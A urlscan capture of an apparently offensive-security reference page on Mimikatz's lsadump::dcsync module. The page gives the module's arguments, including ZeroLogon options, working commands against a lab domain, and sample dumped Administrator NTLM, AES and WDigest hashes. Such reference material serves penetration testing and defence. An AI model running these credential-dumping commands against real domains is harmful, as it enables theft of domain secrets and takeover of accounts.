tools.thehacker.recipes
Open in
urlscan Pro
2606:4700:4400::6812:282f
Public Scan
URL:
https://tools.thehacker.recipes/mimikatz/modules/lsadump/dcsync
Submission: On February 23 via manual from IL — Scanned from ES
Submission: On February 23 via manual from IL — Scanned from ES
Form analysis
0 forms found in the DOMText Content
The Hacker Tools GitHubTwitterThe Hacker Recipes Search ⌃K Links Introduction Mimikatz 🥝 General 🛠️ Modules crypto dpapi event kerberos lsadump backupkeys cache changentlm dcshadow dcsync mbc netsync lsa packages postzerologon rpdata sam secrets setntlm trust zerologon misc net privilege process rpc sekurlsa service sid standard token ts vault 🛠️ Impacket CrackMapExec BloodHound Rubeus Exegol PowerSploit Hashcat Powered By GitBook DCSYNC lsadump::dcsync can be used to do a DCSync and retrieve domain secrets (cf. Pass-the-Ticket). This command uses the Directory Replication Service Remote protocol (MS-DRSR) to request from a domain controller to synchronize a specified entry. It's the same protocol that domain controllers are using between them. It has the following command line arguments: /all : It will DCSync the entire active directory database /user: perform syncing only for the specified user /export : Save the output /csv : export to csv /dc or /kdc: Specify the Domain Controller to connect to and gather data /guid : The GUID of the object to sync credentials. It can be obtained with net::trust. The following command line arguments of lsadump::dcsync can be used for ZeroLogon exploitation: /authuser: the domain controller's machine account /authdomain: the NetBIOS of the domain /authpassword: it has to be set to blank "" /authntlm: user NTLM authentication mimikatz # lsadump::dcsync /domain:hacklab.local /user:hacklab\Administrator [DC] 'hacklab.local' will be the domain [DC] 'DC.hacklab.local' will be the DC server [DC] 'hacklab\Administrator' will be the user account [rpc] Service : ldap [rpc] AuthnSvc : GSS_NEGOTIATE (9) Object RDN : Administrator ** SAM ACCOUNT ** SAM Username : Administrator Account Type : 30000000 ( USER_OBJECT ) User Account Control : 00000200 ( NORMAL_ACCOUNT ) Account expiration : 01/01/1601 01:00:00 Password last change : 24/09/2021 16:24:41 Object Security ID : S-1-5-21-2725560159-1428537199-2260736313-500 Object Relative ID : 500 Credentials: Hash NTLM: b09a14d2d325026f8986d4a874fbcbc7 ntlm- 0: b09a14d2d325026f8986d4a874fbcbc7 ntlm- 1: a06b19f88e0432e937a67fb6848e56bd lm - 0: b28dd7b27e8cf0d2293087d70fc35769 Supplemental Credentials: * Primary:NTLM-Strong-NTOWF * Random Value : a367950918bb2ccabb50ab88e8ffb09f * Primary:Kerberos-Newer-Keys * Default Salt : HACKLAB.LOCALAdministrator Default Iterations : 4096 Credentials aes256_hmac (4096) : 0c1230dca827b75e872b5e5601eb6b76016412b4dd96b4aeb99a59a43490182c aes128_hmac (4096) : e52cb5008be21bfe2e8429c74659d925 des_cbc_md5 (4096) : 4f45e3a7cd34bc83 * Primary:Kerberos * Default Salt : HACKLAB.LOCALAdministrator Credentials des_cbc_md5 : 4f45e3a7cd34bc83 * Packages * NTLM-Strong-NTOWF * Primary:WDigest * 01 6ca5712f90260e1eb3abd67598e6750a 02 8dffe5b3aefb6e5ae29e628d2ee96a45 03 17be46dc199faf9b0bbda5bad36e3d6e 04 6ca5712f90260e1eb3abd67598e6750a 05 6fc635e3af189352029ce83a2219fa3c 06 510782016677b838b585d4f04d23f98a 07 b358628b75f049cf9e78f5e49bc560a2 08 c40c4076a86fbf852da4cb4bfa721d74 09 bf6734b4833bd61834c48fa6533acb9a 10 3c148f6edbc99e9a489d72fb809ee66b 11 0a100f8d2212e336adf8c429722d3a8c 12 c40c4076a86fbf852da4cb4bfa721d74 13 e649568c12076eba2026544142dc74fd 14 3ef797336ba53aaf034774a4fe8b06dc 15 797740715ee8fa059260c583fef36d5e 16 84aa405aaf242960160143fa357a3c7f 17 bb9ea6391483fa61fba5dced60ea039c 18 3871d21dfa14ede3c56b04ffc5970b1c 19 8e7946ea6e13210cb3ded49e2ff501fa 20 7480b0f8878e31ee2dcf3507fc2dbf54 21 2f7b7c9a2ac171f4417a38a52ef89989 22 3483e4a4ca60cd4b3d0bc66dc900f175 23 e1fa4a98cdab50c99934120090885d90 24 e16cb6277ed064c290498037f5dfe5b3 25 d6b096727b0d7a39cae06afd874247a9 26 f7a5f95bb7f0d0be1d8fe247b875cb29 27 e781f3584bf099e0a485657e832c6e74 28 acb55c0b8828a6660b166fc649708c1c 29 8fd36767c074ca738a81d5c7298295c3 When running lsadump::dcsync directly on the domain controller, it is not needed to specify the domain in the/user. mimikatz # lsadump::dcsync /user:Administrator /domain:hacklab.local Previous dcshadow Next mbc Last modified 1yr ago To pick up a draggable item, press the space bar. While dragging, use the arrow keys to move the item. Press space again to drop the item in its new position, or press escape to cancel. Close Introduction Mimikatz 🥝 General 🛠️ Modules crypto dpapi event kerberos lsadump backupkeys cache changentlm dcshadow dcsync mbc netsync lsa packages postzerologon rpdata sam secrets setntlm trust zerologon misc net privilege process rpc sekurlsa service sid standard token ts vault 🛠️ Impacket CrackMapExec BloodHound Rubeus Exegol PowerSploit Hashcat Powered By GitBook